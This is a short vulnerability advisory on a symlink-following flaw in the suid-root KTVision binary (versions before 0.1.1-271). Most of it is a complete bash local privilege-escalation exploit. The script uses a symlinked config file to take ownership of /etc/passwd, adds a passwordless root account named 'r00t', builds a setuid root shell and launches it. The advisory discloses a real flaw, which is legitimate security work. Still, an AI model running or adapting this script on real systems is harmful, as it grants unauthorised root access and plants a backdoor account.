Vulnerability KTVision Affected ktvision prior to 0.1.1-271 Description Paul Starzetz found the following. There is a symlink-following problem in the ktvision binary, which in many distributions is installed suid root. It is discouraging that such trivial symlink attacks are still possible nowadays. No further comment. For completeness, a bash script demonstrating this vulnerability is attached below. #!/bin/bash link=/home/paul/.kde/share/config linkto=/etc/passwd target=/opt/kde/bin/ktvision echo "" echo "KTVision <= 0.1.1-271 local r00t exploit by IhaQueR" echo "" if ! test -u $target ; then echo "[-] $target not found" exit 1 fi; echo "[+] $target found" rm -f sush* cat <<__DUPA__>>sush.c #include <stdio.h> main() { setuid(geteuid()); setgid(getegid()); execl("/bin/bash", "/bin/bash", NULL); } __DUPA__ echo " compiling sush" res=$(gcc sush.c -o sush) if test "$res" != "" -o ! -x sush ; then echo "[-] failed" rm sush* ktvback.* exit 2; fi; echo "[+] success" cp $linkto ktvback.$$ mkdir -p $link rm -f $link/ktvisionrc ln -s $linkto $link/ktvisionrc echo "" echo -n "now running... (ensure that X is up and running)" $target >/dev/null 2>&1 & cpid=$! declare -i cnt declare -i max cnt=0 max=60 while ! test -O $linkto ; do sleep 1; printf " %.2d" $cnt cnt=$(($cnt+1)) if test $cnt -ge $max ; then echo "" echo "" echo "[-] FAILED" rm sush* ktvback.* exit 2; fi; done; kill -9 $cpid >/dev/null 2>&1 rm $link/ktvisionrc echo "" echo "" echo "[+] SUCCESS, creating sush" echo >>$linkto "r00t::0:0:root:/root:/bin/bash" echo "" su r00t -c "chown 0.0 sush; chmod u+s sush; chmod g+s sush; cp ktvback.$$ $linkto; chown 0.0 $linkto" rm ktvback.* sush.c if ! test -u sush ; then echo " hm strange error" rm sush* ktvback.* exit 1 fi; echo "" echo "starting ./sush" ./sush #!plonk Solution Nothing yet.